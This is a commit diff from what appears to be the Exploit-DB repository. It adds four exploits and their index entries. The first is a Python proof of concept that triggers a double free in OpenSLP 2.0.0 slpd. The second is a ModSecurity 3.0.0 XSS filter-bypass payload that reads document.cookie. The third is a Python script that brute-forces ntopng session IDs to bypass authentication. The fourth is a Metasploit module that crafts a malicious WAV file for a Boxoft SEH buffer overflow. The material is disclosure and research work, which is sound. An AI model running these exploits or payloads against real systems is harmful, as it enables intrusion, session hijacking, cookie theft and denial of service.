DB: 2018-07-04

4 changes to exploits/shellcodes openslp 2.0.0 - Double-Free Boxoft WAV to MP3 Converter 1.1 - Buffer Overflow (Metasploit) FTPShell client 6.70 (Enterprise edition) - Stack Buffer Overflow (Metasploit) FTPShell Client 6.70 (Enterprise Edition) - Stack Buffer Overflow (Metasploit) ModSecurity 3.0.0 - Cross-Site Scripting ntop-ng < 3.4.180617 - Authentication Bypass
2018-07-04 05:01:48 +00:00 · 2018-07-04 05:01:48 +00:00 · 6a98e55e9d
commit 6a98e55e9d
parent e8a3702c6c
5 changed files with 491 additions and 1 deletions
--- a/exploits/linux/dos/44972.py
+++ b/exploits/linux/dos/44972.py
@ -0,0 +1,351 @@
+'''
+     _       _      _         _   _        ___
+ ___| |___ _| |   _| |___ _ _| |_| |___   |  _|___ ___ ___
+|_ -| | . | . |  | . | . | | | . | | -_|  |  _|  _| -_| -_|
+|___|_|  _|___|  |___|___|___|___|_|___|  |_| |_| |___|___|
+      |_|
+
+2018-06-28
+
+SLPD DOUBLE FREE 
+================
+
+CVE-2018-12938
+
+An issue was found in openslp-2.0.0 that can be used to induce a double free bug or memory corruption by
+corrupting glibc's doubly-linked memory chunk list. At the time of writing, no patch has been made available.
+The issue was discovered by Magnus Klaaborg Stubman.
+
+On line 409 of slpd_process.c, the *sendbuf pointer is copied to result.
+On line 251, the first reallocation takes place, potentially free()ing the memory if
+it was moved as part of the reallocation.
+On line 547, the second reallocation is done, again potentially free()ing the memory
+if it has to be moved as part of the reallocation, potentially resulting in a double free bug.
+
+Code snippets from openslp-2.0.0/slpd/slpd_process.c:
+
+  237 static int ProcessDASrvRqst(SLPMessage * message, SLPBuffer * sendbuf, int errorcode)
+  238 {
+  ..
+  243    size_t initial_buffer_size = 4096;
+  ..
+  246    /* Special case for when libslp asks slpd (through the loopback) about
+  247     * a known DAs. Fill sendbuf with DAAdverts from all known DAs.
+  248     */
+  249    if (SLPNetIsLoopback(&message->peer))
+  250    {
+  251       *sendbuf = SLPBufferRealloc(*sendbuf, initial_buffer_size); <-- first reallocation
+  ..
+  402 static int ProcessSrvRqst(SLPMessage * message, SLPBuffer * sendbuf,
+  403       int errorcode)
+  404 {
+  405    int i;
+  406    SLPUrlEntry * urlentry;
+  407    SLPDDatabaseSrvRqstResult * db = 0;
+  408    size_t size = 0;
+  409    SLPBuffer result = *sendbuf; <-- pointer is copied
+  ..
+  460    /* check to to see if a this is a special SrvRqst */
+  461    if (SLPCompareString(message->body.srvrqst.srvtypelen,
+  462          message->body.srvrqst.srvtype, 23, SLP_DA_SERVICE_TYPE) == 0)
+  463    {
+  464       errorcode = ProcessDASrvRqst(message, sendbuf, errorcode); <-- sendbuf passed to function
+  ..
+  546    /* reallocate the result buffer */
+  547    result = SLPBufferRealloc(result, size); <-- second reallocation
+
+
+PROOF OF CONCEPT
+================
+
+The following patch can be used to understand the reallocation behavior:
+
+  diff --git a/common/slp_buffer.c b/common/slp_buffer.c
+  index 1cab3f5..b3e3ff1 100644
+  --- a/common/slp_buffer.c
+  +++ b/common/slp_buffer.c
+  @@ -104,7 +104,9 @@ SLPBuffer SLPBufferRealloc(SLPBuffer buf, size_t size)
+            /* Allocate one extra byte for null terminating strings that
+             * occupy the last field of the buffer.
+             */
+  +         printf("xrealloc(%p, %u) = ", buf, sizeof(struct _SLPBuffer) + size + 1);
+            result = xrealloc(buf, sizeof(struct _SLPBuffer) + size + 1);
+  +         printf(" = %p\n", result);
+            if (result)
+                result->allocated = size;
+         }
+
+In order to induce a double-free condition the heap must be massaged
+such that the reallocation attempts to move memory around.
+A proof of concept exploit was developed that demonstrates the vulnerability:
+
+  $ sudo python openslp-2.0.0-double-free-poc.py
+  Proof-of-concept heap massager and double-free trigger for openslp-2.0.0 slpd
+  Run this script before launching slpd
+  [-] Waiting for multicast service request from slpd...
+  [+] Got request! Sending reply to 192.168.245.191 427...
+  [-] Sending first Service Request to 127.0.0.1:427 from 127.0.0.1:53309...
+  [-] Waiting for response...
+  [+] Received 71 bytes from 127.0.0.1:427
+  [-] Sending  packet to (multicast) 239.255.255.253:427 from 192.168.245.191:41965...
+  [+] Got request! Sending reply to 192.168.245.191 41965...
+  [-] Waiting for response from bad-multicast-server.py...
+  [+] Received 71 bytes from 192.168.245.191:427
+  [-] Connecting to 192.168.245.191:427...
+  [+] Connected. Sending...
+  [-] Sent packet to 192.168.245.191:427 from 192.168.245.191:39914...
+  [+] Done!
+  $ sudo ./slpd/slpd -d -c etc/slp.conf
+  ...
+  xrealloc(0x137ba50, 1449) =  = 0x138dd30
+  xrealloc(0x137ba50, 69) =
+  *** Error in `./slpd/slpd': double free or corruption (fasttop): 0x000000000137ba50 ***
+
+As shown in slpd's output prior to crashing, 0x138dd30 is returned when 0x137ba50 is
+reallocated, thus free()ing 0x137ba50. However, afterwards 0x137ba50 is yet again reallocated,
+and due to the layout of the heap, free()d a second time, resulting in a double free.
+
+EXPLOIT
+=======
+
+dumpco.re/exploits/openslp-2.0.0-double-free-poc.py:
+'''
+
+  import os
+  import sys
+  import struct
+  import socket
+
+  targetIp = "192.168.245.194"
+
+  abuf = ("\x02\x08\xff\xff\xff\x00\x00\x00\x00\x00\x58\x27\x00\x02\x65\x6e" +
+     "\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+     "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+     "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+     "\x00\x00\x00\x00\x00\x00\x00")
+
+  mcastserversock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
+  mcastserversock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+  mcastserversock.bind(('239.255.255.253', 427))
+  mreq = struct.pack("4sl", socket.inet_aton('239.255.255.253'), socket.INADDR_ANY)
+  mcastserversock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
+
+  print "Proof-of-concept heap massager and double-free trigger for openslp-2.0.0 slpd\nRun this script before launching slpd and remember to update targetIp variable."
+  print "[-] Waiting for multicast service request from slpd..."
+  data, addr = mcastserversock.recvfrom(1024)
+  print "[+] Got request! Sending reply to " + addr[0] + " " + str(addr[1]) + "..."
+  mcastserversock.sendto(abuf, (addr[0], addr[1]))
+
+  localhostsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
+  localhostsock.bind(('127.0.0.1', 0))
+  print "[-] Sending first Service Request to 127.0.0.1:427 from 127.0.0.1:" + str(localhostsock.getsockname()[1]) + "..."
+
+  buf = ("\x02\x01\x00\x00\x31\x00\x00\x00\x00\x00\x66\x0b\x00\x02\x65\x6e" +
+         "\x00\x00\x00\x17\x73\x65\x72\x76\x69\x63\x65\x3a\x64\x69\x72\x65" +
+         "\x63\x74\x6f\x72\x79\x2d\x61\x67\x65\x6e\x74\x00\x00\x00\x00\x00" +
+         "\x00")
+
+  localhostsock.sendto(buf, ('127.0.0.1', 427))
+  print "[-] Waiting for response..."
+  data, addr = localhostsock.recvfrom(1024)
+  print "[+] Received " + str(len(data)) + " bytes from " + addr[0] + ":" + str(addr[1])
+
+  clientsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
+  clientsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+  clientsock.bind(('0.0.0.0', 0))
+  print "[-] Sending  packet to (multicast) 239.255.255.253:427 from " + targetIp + ":" + str(clientsock.getsockname()[1]) + "..."
+  mreq = struct.pack("4sl", socket.inet_aton('239.255.255.253'), socket.INADDR_ANY)
+  clientsock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
+
+  buf = ("\x02\x01\x00\x00\x38\x20\x00\x00\x00\x00\x66\x0c\x00\x02\x65\x6e" +
+         "\x00\x00\x00\x17\x73\x65\x72\x76\x69\x63\x65\x3a\x64\x69\x72\x65" +
+         "\x63\x74\x6f\x72\x79\x2d\x61\x67\x65\x6e\x74\x00\x07\x44\x45\x46" +
+         "\x41\x55\x4c\x54\x00\x00\x00\x00")
+
+  clientsock.sendto(buf, ('239.255.255.253', 427))
+
+  data, addr = mcastserversock.recvfrom(1024)
+  print "[+] Got request! Sending reply to " + addr[0] + " " + str(addr[1]) + "..."
+  mcastserversock.sendto(abuf, (addr[0], addr[1]))
+
+  clientsock.close()
+  print "[+] Received " + str(len(data)) + " bytes from " + addr[0] + ":" + str(addr[1])
+
+  buf = ("\x02\x01\x00\x00\x38\x00\x00\x00\x00\x00\x66\x0d\x00\x02\x65\x6e" +
+         "\x00\x00\x00\x17\x73\x65\x72\x76\x69\x63\x65\x3a\x64\x69\x72\x65" +
+         "\x63\x74\x6f\x72\x79\x2d\x61\x67\x65\x6e\x74\x00\x07\x44\x45\x46" +
+         "\x41\x55\x4c\x54\x00\x00\x00\x00")
+
+  tcpclientsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+  print "[-] Connecting to " + targetIp + ":427..."
+  tcpclientsock.connect((targetIp, 427))
+  print "[+] Connected. Sending..."
+  tcpclientsock.send(buf)
+  print "[-] Sent packet to " + targetIp + ":427 from " + targetIp + ":" + str(tcpclientsock.getsockname()[1]) + "...\n[+] Done!"
+
+'''
+IMPACT
+======
+
+Although not attempted, the issue may be exploitable such that a remote unauthenticated
+attacker may gain Remote Code Execution, since double frees have been known to be exploitable
+leading to RCE. As such, this issue may score 'high' on CVSS.
+
+TIMELINE
+========
+
+2018-01-22 Discovery
+2018-01-23 Vendor notification
+2018-06-28 Public disclosure
+2018-06-29 MITRE assigned CVE-ID
+
+REFERENCES
+==========
+
+- nvd.nist.gov/vuln/detail/CVE-2018-12938
+- cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12938
+- vuldb.com/?id.120078
+- securityfocus.com/bid/104576
+- access.redhat.com/security/cve/cve-2018-12938
+- bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-12938
+
+
+CVE ASSIGNMENT
+==============
+
+-----BEGIN PGP SIGNED MESSAGE-----
+Hash: SHA256
+
+[Suggested description]
+slpd_process.c in OpenSLP 2.0.0 has a double free resulting in
+denial of service (daemon crash) or possibly unauthenticated remote code execution.
+
+------------------------------------------
+
+[Additional Information]
+A proof of concept exploit has been developed, but due to size
+constraints of this form it cannot sent. I can provide it over e-mail
+if needed. I originally reported this issue to the maintainers on
+2018-01-23 but they have failed to provide a patch. I am publicly
+disclosing the issue as soon as a CVE-ID is assigned.
+
+Vulnerability:
+On line 409 of slpd_process.c, the *sendbuf pointer is copied to result.
+On line 251, the first reallocation takes place, potentially free()ing the memory if
+it was moved as part of the reallocation.
+On line 547, the second reallocation is done, again potentially free()ing the memory
+if it has to be moved as part of the reallocation, potentially resulting in a double free bug.
+
+Code snippets from openslp-2.0.0/slpd/slpd_process.c:
+
+237 static int ProcessDASrvRqst(SLPMessage * message, SLPBuffer * sendbuf, int errorcode)
+238 {
+...
+243    size_t initial_buffer_size = 4096;
+...
+246    /* Special case for when libslp asks slpd (through the loopback) about
+247     * a known DAs. Fill sendbuf with DAAdverts from all known DAs.
+248     */
+249    if (SLPNetIsLoopback(&message->peer))
+250    {
+251       *sendbuf = SLPBufferRealloc(*sendbuf, initial_buffer_size); <-- first reallocation
+...
+402 static int ProcessSrvRqst(SLPMessage * message, SLPBuffer * sendbuf,
+403       int errorcode)
+404 {
+405    int i;
+406    SLPUrlEntry * urlentry;
+407    SLPDDatabaseSrvRqstResult * db = 0;
+408    size_t size = 0;
+409    SLPBuffer result = *sendbuf; <-- pointer is copied
+...
+460    /* check to to see if a this is a special SrvRqst */
+461    if (SLPCompareString(message->body.srvrqst.srvtypelen,
+462          message->body.srvrqst.srvtype, 23, SLP_DA_SERVICE_TYPE) == 0)
+463    {
+464       errorcode = ProcessDASrvRqst(message, sendbuf, errorcode); <-- sendbuf passed to function
+...
+546    /* reallocate the result buffer */
+547    result = SLPBufferRealloc(result, size); <-- second reallocation
+
+------------------------------------------
+
+[VulnerabilityType Other]
+Double free
+
+------------------------------------------
+
+[Vendor of Product]
+openslp.org
+
+------------------------------------------
+
+[Affected Product Code Base]
+openslp - 2.0.0 and earlier
+
+------------------------------------------
+
+[Affected Component]
+openslp-2.0.0/slpd/slpd_process.c
+
+------------------------------------------
+
+[Attack Type]
+Remote
+
+------------------------------------------
+
+[Impact Code execution]
+true
+
+------------------------------------------
+
+[Impact Denial of Service]
+true
+
+------------------------------------------
+
+[Attack Vectors]
+To exploit the vulnerability, a malicious user must send a malformed SLP packet to the target system.
+
+------------------------------------------
+
+[Has vendor confirmed or acknowledged the vulnerability?]
+true
+
+------------------------------------------
+
+[Discoverer]
+Magnus Klaaborg Stubman
+
+------------------------------------------
+
+[Reference]
+dumpco.re/blog/openslp-2.0.0-double-free
+
+Use CVE-2018-12938.
+
+
+- --
+CVE Assignment Team
+M/S M300, 202 Burlington Road, Bedford, MA 01730 USA
+[ A PGP key is available for encrypted communications at
+ cve.mitre.org/cve/request_id.html ]
+-----BEGIN PGP SIGNATURE-----
+Version: GnuPG v1
+
+iQIcBAEBCAAGBQJbNWOrAAoJEA2h+fVryJLoqocP/iwnxfQU+gKSj4HGdxTI6hZt
+raqOEC4/Pgpg7Ha2tU5jw1STfUnesPk0tDMfwSioTDYQCHWn9wWg2Yg7SIzovH0t
+wjdI0L//THgMVjnAwZroLcoWGFUCOVu8umjcXO15y0DhllCEoSzjNXKcRKPOA0ix
+Ej2Pc15umaqNO1HsLnvOOhvp1wMWOXsPNVnC+YrExbIA9FA1+bdUGSDRY4qpcvuh
+m+ZLzPdlu2WQJDB11TfEYrfEQkbwcOUGgvVY/Gr3zFBvviP8tf69IsKVkGHKdZ3w
+6+Ev/GMTWXH0Zg36Oxpxe4jVDmm0gKJr7JmLNB9FhhKMYHIqG8k2pmhGzjDJ7emC
+P7o/dpuRjXbIw4JWxjju7fDrWP0pbqD9Ezu3jiqfjSFypCFhSCbY+pGZEOS1/Myt
+MdW7jsfUXZnZXudq1ihttEJMBxbsOdbZo/XnfSF/77AX74dJn1Irsq972iUF5wpK
+iIlM6dGrBwVO3igmQr6821+F5tJ45GuR9cxUOtNJsUIJ0sULzaiZEspXTbu/hxlt
+SjKGrqppZm0jt89d8i7ugkhDZCPODU/ELjJtu58Bd5SG5AtF0E80gMIDEOmq6qj2
+oyUrmCaRHghHtzwJpYzRwMwjCMRg0XnuJ4YM0NQjiDYXgS6+yh/56t8M/9PLt4Nj
+AKXh3pI64gZWkAXJexiW
+=iMrL
+-----END PGP SIGNATURE-----
+'''
--- a/exploits/linux/webapps/44970.txt
+++ b/exploits/linux/webapps/44970.txt
@ -0,0 +1,20 @@
+# Exploit Title: ModSecurity 3.0.0 - Cross-Site Scripting
+# Date: 2018-07-02
+# Vendor Homepage: https://www.modsecurity.org
+# Software: ModSecurity
+# Category: Web Application Firewall
+# Exploit Author: Adipta Basu
+# Tested on: Mac OS High Sierra
+# CVE: N/A
+# Description: ModSecurity 3.0.0 has XSS via an onError attribute of an IMG element
+
+# Details: 
+# After doing source code analysis, I found that if <img src=x onError=prompt(111)> 
+# is passed as a parameter, a pop-up is obtained. This is because the filter flags 
+# terms like "script","alert",etc. Moreover it also flags if there is a string placed
+# inside the first bracket. That is why I had to use 111. However document.cookie when
+# passed works fine.
+ 
+Reproduction Steps:
+ 
+   - Use <img src=x onError=prompt(3)> or <img src=x onError=prompt(document.cookie)>
--- a/exploits/lua/webapps/44973.py
+++ b/exploits/lua/webapps/44973.py
@ -0,0 +1,49 @@
+'''
+# Vulnerability title: ntop-ng < 3.4.180617 - Authentication Bypass
+# Author: Ioannis Profetis
+# Contact: me at x86.re
+# Vulnerable versions: < 3.4.180617-4560
+# Fixed version: 3.4.180617
+# Link: ntop.org
+# Date: 2.07.2018
+# CVE-2018-12520
+
+# Product Details
+ntopng is the next generation version of the original ntop, a network traffic probe that shows the network usage, similar to what the popular top Unix command does. ntopng is based on libpcap and it has been written in a portable way in order to virtually run on every Unix platform, MacOSX and on Windows as well.
+
+# Vulnerability Details
+An issue was discovered in ntopng 3.4. 
+The PRNG involved in the generation of session IDs is not seeded at program startup. 
+This results in deterministic session IDs being allocated for active user sessions. An attacker with foreknowledge of the operating system and standard library in use by the host running the service and the username of the user whose session they're targeting can abuse the deterministic random number generation in order to hijack the user's session, thus escalating their access.
+
+# Exploit
+A proof-of-concept for this vulnerability can be found below. Note that this script has been tested with Python 2.7, and requires the 'requests' module, which can be found in the Python Package Index.
+'''
+
+import requests
+import sys
+import hashlib
+from ctypes import *
+libc = CDLL('libc.so.6')
+
+if __name__ == "__main__":
+    if len(sys.argv) < 3:
+        print('[-] Usage: python poc.py <host> <username>')
+        sys.exit(1)
+
+    host, username = sys.argv[1:]
+    for i in range(256):
+        print('[*] Trying with rand() iteration %d...' % i)
+        session = hashlib.md5(('%d' % libc.rand()) + username).hexdigest()
+        r = requests.get(host + '/lua/network_load.lua', cookies={'user': username, 'session': session})
+        if r.status_code == 200:
+            print('[+] Got it! Valid session cookie is %s for username %s.' % (session, username))
+            break
+
+'''
+# Mitigation
+Upgrade to the latest stable version of ntop-ng 3.4.
+
+# Attack Type
+Remote, Unauthenticated, Escalation of Privileges, Information Disclosure
+'''
--- a/exploits/windows/local/44971.rb
+++ b/exploits/windows/local/44971.rb
@ -0,0 +1,66 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Boxoft WAV to MP3 Converter v1.1 Buffer Overflow",
+      'Description'    => %q{
+       This module exploits a stack buffer overflow in Boxoft WAV to MP3 Converter versions 1.0 and 1.1.
+       By constructing a specially crafted WAV file and attempting to convert it to an MP3 file in the
+       application, a buffer is overwritten, which allows for running shellcode.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Robbie Corley', # EDB POC
+          'Shelby Pace'    # Metasploit Module
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2015-7243' ],
+          [ 'EDB', '38035' ]
+        ],
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [
+            'Boxoft WAV to MP3 Converter v1.1',
+            {
+              'Ret' => 0x0040144c # P/P/R from wavtomp3.exe (1.1.0.0)
+            }
+          ]
+        ],
+      'Payload'        =>
+        {
+          'BadChars' => "\x00"
+        },
+      'Privileged'     => false,
+      'DisclosureDate' => "Aug 31 2015",
+      'DefaultTarget'  => 0))
+
+    register_options(
+    [
+      OptString.new('FILENAME', [true, 'The malicious file name', 'music.wav'])
+    ])
+  end
+
+  def exploit
+    file_payload = payload.encoded
+
+    buf = make_fast_nops(4132)
+    buf << "\xeb\x06#{Rex::Text.rand_text_alpha(2, payload_badchars)}" # nseh (jmp to payload)
+    buf << [target.ret].pack("V*")  # seh
+    buf << file_payload
+    # Size isn't very sensitive
+    buf << make_fast_nops(5860)
+
+    file_create(buf)
+  end
+end
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6011,6 +6011,7 @@ id,file,description,date,author,type,platform,port
 44958,exploits/windows/dos/44958.py,"Core FTP LE 2.2 - Buffer Overflow (PoC)",2018-07-02,"Berk Cem Göksel",dos,windows,21
 44962,exploits/linux/dos/44962.txt,"SIPp 3.6 - Local Buffer Overflow (PoC)",2018-07-02,"Fakhri Zulkifli",dos,linux,
 44965,exploits/hardware/dos/44965.py,"Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC)",2018-07-02,t4rkd3vilz,dos,hardware,80
+44972,exploits/linux/dos/44972.py,"openslp 2.0.0 - Double-Free",2018-07-03,"Magnus Klaaborg Stubman",dos,linux,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -9801,6 +9802,7 @@ id,file,description,date,author,type,platform,port
 44906,exploits/windows/local/44906.txt,"Microsoft COM for Windows - Privilege Escalation",2018-06-18,"Code White",local,windows,
 44920,exploits/linux/local/44920.txt,"Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution",2018-06-21,"Paul Taylor",local,linux,
 44961,exploits/windows/local/44961.txt,"Enhanced Mitigation Experience Toolkit (EMET) - XML External Entity Injection",2018-07-02,hyp3rlinx,local,windows,
+44971,exploits/windows/local/44971.rb,"Boxoft WAV to MP3 Converter 1.1 - Buffer Overflow (Metasploit)",2018-07-03,Metasploit,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16592,7 +16594,7 @@ id,file,description,date,author,type,platform,port
 44890,exploits/linux/remote/44890.rb,"DHCP Client - Command Injection 'DynoRoot' (Metasploit)",2018-06-13,Metasploit,remote,linux,
 44921,exploits/linux/remote/44921.txt,"Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution",2018-06-21,"Paul Taylor",remote,linux,22
 44941,exploits/windows/remote/44941.txt,"Foxit Reader 9.0.1.1049 - Remote Code Execution",2018-06-25,mr_me,remote,windows,
-44968,exploits/windows/remote/44968.rb,"FTPShell client 6.70 (Enterprise edition) - Stack Buffer Overflow (Metasploit)",2018-07-02,Metasploit,remote,windows,
+44968,exploits/windows/remote/44968.rb,"FTPShell Client 6.70 (Enterprise Edition) - Stack Buffer Overflow (Metasploit)",2018-07-02,Metasploit,remote,windows,
 44969,exploits/linux/remote/44969.rb,"Nagios XI 5.2.6-5.4.12 - Chained Remote Code Execution (Metasploit)",2018-07-02,Metasploit,remote,linux,80
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
@ -39615,3 +39617,5 @@ id,file,description,date,author,type,platform,port
 44959,exploits/hardware/webapps/44959.py,"VMware NSX SD-WAN Edge < 3.1.2 - Command Injection",2018-07-02,ParagonSec,webapps,hardware,
 44960,exploits/php/webapps/44960.html,"DAMICMS 6.0.0 - Cross-Site Request Forgery (Add Admin)",2018-07-02,bay0net,webapps,php,80
 44964,exploits/php/webapps/44964.txt,"Dolibarr ERP CRM  < 7.0.3 - PHP Code Injection",2018-07-02,om3rcitak,webapps,php,80
+44970,exploits/linux/webapps/44970.txt,"ModSecurity 3.0.0 - Cross-Site Scripting",2018-07-03,"Adipta Basu",webapps,linux,
+44973,exploits/lua/webapps/44973.py,"ntop-ng < 3.4.180617 - Authentication Bypass",2018-07-03,"Ioannis Profetis",webapps,lua,